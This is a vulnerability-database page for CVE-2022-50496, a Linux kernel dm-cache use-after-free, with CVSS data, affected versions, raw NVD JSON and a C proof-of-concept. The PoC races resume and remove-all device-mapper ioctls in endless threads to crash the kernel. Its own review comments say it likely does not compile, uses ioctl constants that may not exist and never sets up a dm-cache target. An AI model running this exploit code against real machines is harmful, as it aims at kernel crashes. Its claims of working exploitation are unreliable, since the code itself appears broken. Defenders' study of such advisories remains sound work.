Security Vulnerability Report
CVE-2022-50496 CVSS 7.8 HIGH

CVE-2022-50496

Published: 2025-10-04 16:15:47
Last Modified: 2026-01-22 19:06:12
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: dm cache: Fix UAF in destroy() Dm_cache also has the same UAF problem when dm_resume() and dm_destroy() are concurrent. Therefore, cancelling timer again in destroy().

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.0(包含dm cache模块的所有受影响版本)
Linux Kernel 5.x 系列受影响版本
Linux Kernel 4.x 系列受影响版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2022-50496 PoC - dm cache UAF via concurrent dm_resume/dm_destroy
// This PoC demonstrates the race condition between dm_resume() and dm_destroy()
// that triggers a Use-After-Free in the dm cache module.
//
// Note: Requires root privileges to manipulate device-mapper devices.
// Compile: gcc -o poc_cve_2022_50496 poc.c -lpthread
//
// NOTE(review): what this listing demonstrably does, versus what the comments
// above claim. It opens /dev/mapper/control, issues one create ioctl with a
// device name, then spins two threads that repeatedly issue a resume-style
// ioctl and DM_REMOVE_ALL_CMD with their results ignored. No table is loaded
// anywhere in this file, so it cannot be confirmed from here that a dm-cache
// target (the code path named by the CVE) is ever instantiated -- verify on a
// disposable test VM before treating this as evidence of exploitability.
// NOTE(review): DM_CREATE_CMD and DM_RESUME_CMD are not names I recognise from
// <linux/dm-ioctl.h>, and the *_CMD constants that header does define are
// command ordinals rather than ioctl request codes; confirm that this
// translation unit even compiles before relying on it.
// NOTE(review): the page's CVSS vector is PR:L, yet main() refuses to run
// unless uid 0; whether the control node is reachable with lower privilege
// is not shown by this code. The observable outcome the code itself predicts
// is a kernel crash (availability), nothing more controlled.
// Mitigation is the kernel-side fix referenced by this CVE (re-cancelling the
// timer in destroy(), per the description); deploy a stable kernel carrying
// one of the fix commits listed in the page's References / Raw JSON section.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <linux/dm-ioctl.h>

// Defined but never referenced in this file.
#define DM_CLEAR_CMD 0x1

// Structure to hold DM ioctl data.
// Defined but never used in this file; every call site passes a bare
// struct dm_ioctl instead.
struct dm_ioctl_sync {
    struct dm_ioctl header;
};

// Open the device-mapper control node read/write.
// Returns the open fd, or -1 after printing the errno text via perror().
// The caller owns the descriptor (main() closes it).
int dm_open(void) {
    int fd = open("/dev/mapper/control", O_RDWR);
    if (fd < 0) {
        perror("Cannot open /dev/mapper/control");
        return -1;
    }
    return fd;
}

// Issue a single DM_CREATE_CMD ioctl carrying `name` and DM_PERSISTENT_DEV_FLAG.
// Despite the function's name, no target table is loaded here, so this does
// not by itself set up a dm-cache target (TODO(review): confirm intent).
// Returns 0 on success, -1 on allocation or ioctl failure (errno text printed
// via perror() in the ioctl case). The heap buffer is freed on every path.
int create_dm_cache(int fd, const char *name) {
    struct dm_ioctl *dmi = calloc(1, sizeof(struct dm_ioctl));
    if (!dmi) return -1;
    dmi->version[0] = DM_VERSION_MAJOR;
    dmi->version[1] = DM_VERSION_MINOR;
    dmi->version[2] = DM_VERSION_PATCHLEVEL;
    // Both sizes equal the bare header: no payload follows the struct.
    dmi->data_size = sizeof(struct dm_ioctl);
    dmi->data_start = sizeof(struct dm_ioctl);
    // calloc() zeroed the buffer and the copy stops one byte short, so the
    // name field stays NUL-terminated even when `name` is longer than the field.
    strncpy(dmi->name, name, sizeof(dmi->name) - 1);
    dmi->flags = DM_PERSISTENT_DEV_FLAG;
    if (ioctl(fd, DM_CREATE_CMD, dmi) < 0) {
        perror("DM_CREATE failed");
        free(dmi);
        return -1;
    }
    free(dmi);
    return 0;
}

// Thread body: repeatedly issue the resume-style ioctl on the control fd.
// `arg` must point at an int holding the control fd; it is read once.
// Never returns: the loop has no exit, so the trailing `return NULL` is
// unreachable and the thread lives until the process dies.
// NOTE(review): unlike create_dm_cache(), version[] is left zero and no
// device name or dev number is filled in, and the ioctl result is discarded,
// so a rejected request would spin silently. Which device (if any) this
// addresses cannot be determined from this file.
// The CVE description attributes the fix to cancelling a timer in destroy();
// any timer set up on the resume side is not visible in this code.
void *resume_thread(void *arg) {
    int fd = *(int *)arg;
    struct dm_ioctl dmi;
    memset(&dmi, 0, sizeof(dmi));
    dmi.data_size = sizeof(dmi);
    dmi.data_start = sizeof(dmi);
    dmi.flags = DM_PERSISTENT_DEV_FLAG;
    while (1) {
        ioctl(fd, DM_RESUME_CMD, &dmi);
        usleep(1);
    }
    return NULL;
}

// Thread body: repeatedly issue DM_REMOVE_ALL_CMD on the control fd.
// `arg` must point at an int holding the control fd; it is read once.
// Never returns (same unbounded loop as resume_thread()). As in that thread,
// version[] is zero and the ioctl result is ignored. The comment that this
// "triggers UAF when concurrent with resume" is the author's claim about
// kernel behaviour; nothing in this file demonstrates it.
void *destroy_thread(void *arg) {
    int fd = *(int *)arg;
    struct dm_ioctl dmi;
    memset(&dmi, 0, sizeof(dmi));
    dmi.data_size = sizeof(dmi);
    dmi.data_start = sizeof(dmi);
    while (1) {
        ioctl(fd, DM_REMOVE_ALL_CMD, &dmi);
        usleep(1);
    }
    return NULL;
}

// Entry point. argc/argv are accepted but unused.
// Flow: refuse to run unless uid 0, open the control node, issue the create
// ioctl, then start the two looping threads and join them.
// Because neither thread ever exits, the joins block forever; the final
// close(fd) and `return 0` are reached only if the process is terminated
// some other way. pthread_create() return values are not checked, so a
// failed thread start would make the matching join undefined.
int main(int argc, char *argv[]) {
    int fd;
    pthread_t t1, t2;
    printf("[+] CVE-2022-50496 PoC - dm cache UAF\n");
    printf("[+] Requires root privileges\n");
    if (getuid() != 0) {
        fprintf(stderr, "[-] Must run as root\n");
        return 1;
    }
    fd = dm_open();
    if (fd < 0) return 1;
    // Issue the create ioctl (see create_dm_cache(): no table is loaded).
    if (create_dm_cache(fd, "cache_vuln") < 0) {
        close(fd);
        return 1;
    }
    printf("[+] Starting concurrent resume/destroy threads...\n");
    printf("[+] This may crash the kernel due to UAF\n");
    // Both threads share the same control fd through a pointer to `fd`;
    // `fd` outlives them because main() never returns while they run.
    pthread_create(&t1, NULL, resume_thread, &fd);
    pthread_create(&t2, NULL, destroy_thread, &fd);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    close(fd);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50496", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:46.657", "lastModified": "2026-01-22T19:06:12.297", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm cache: Fix UAF in destroy()\n\nDm_cache also has the same UAF problem when dm_resume()\nand dm_destroy() are concurrent.\n\nTherefore, cancelling timer again in destroy()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.9", "versionEndExcluding": "4.9.337", "matchCriteriaId": "0E0273F2-224A-448F-92F6-D08F1E18B7CD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.303", "matchCriteriaId": "1E7450AD-4739-46F0-B81B-C02E7B35A97B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AE8904A3-99BE-4E49-9682-1F90A6373F4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": 
"A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.87", "matchCriteriaId": "7B9E5B1C-CD46-4790-9500-615863850401"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.18", "matchCriteriaId": "08D38C5F-9644-4549-BBA6-F0860F024D14"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.4", "matchCriteriaId": "BC4189D9-5478-4E88-A78D-9C1DE29B217C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/034cbc8d3b47a56acd89453c29632a9c117de09d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2b17026685a270b2beaf1cdd9857fcedd3505c7e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2f097dfac7579fd84ff98eb1d3acd41d53a485f3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4d20032dd90664de09f2902a7ea49ae2f7771746", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6a3e412c2ab131c54945327a7676b006f000a209", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6a459d8edbdbe7b24db42a5a9f21e6aa9e00c2aa", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6ac4f36910764cb510bafc4c3768544f86ca48ca", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": 
"https://git.kernel.org/stable/c/993406104d2b28fe470126a062ad37a1e21e792e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d2a0b298ebf83ab6236f66788a3541e91ce75a70", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}